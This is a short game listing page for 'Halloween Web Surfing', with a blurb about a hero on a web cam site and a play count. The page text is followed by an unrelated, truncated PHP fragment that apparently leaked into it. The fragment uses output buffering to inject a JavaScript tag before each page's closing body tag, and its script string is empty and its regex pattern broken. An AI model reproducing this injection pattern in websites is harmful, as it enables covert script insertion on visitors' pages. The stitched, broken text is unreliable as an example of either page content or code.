Play Halloween Web Surfing

Halloween Web Surfing

Halloween Web Surfing

2872 1

Web surfing is pretty safe if you have an actual antivirus software. That's what our hero thought as well, until he found that mystical web cam site. This halloween night is gonna be full of fun.

Play
// Start output buffering with a callback function to inject the JavaScript ob_start(function($buffer) { // Define the script tag to be injected $script = ''; // Inject the JavaScript before the closing body tag, if it exists return preg_replace("##", "$script\n", $buffer, 1); }); /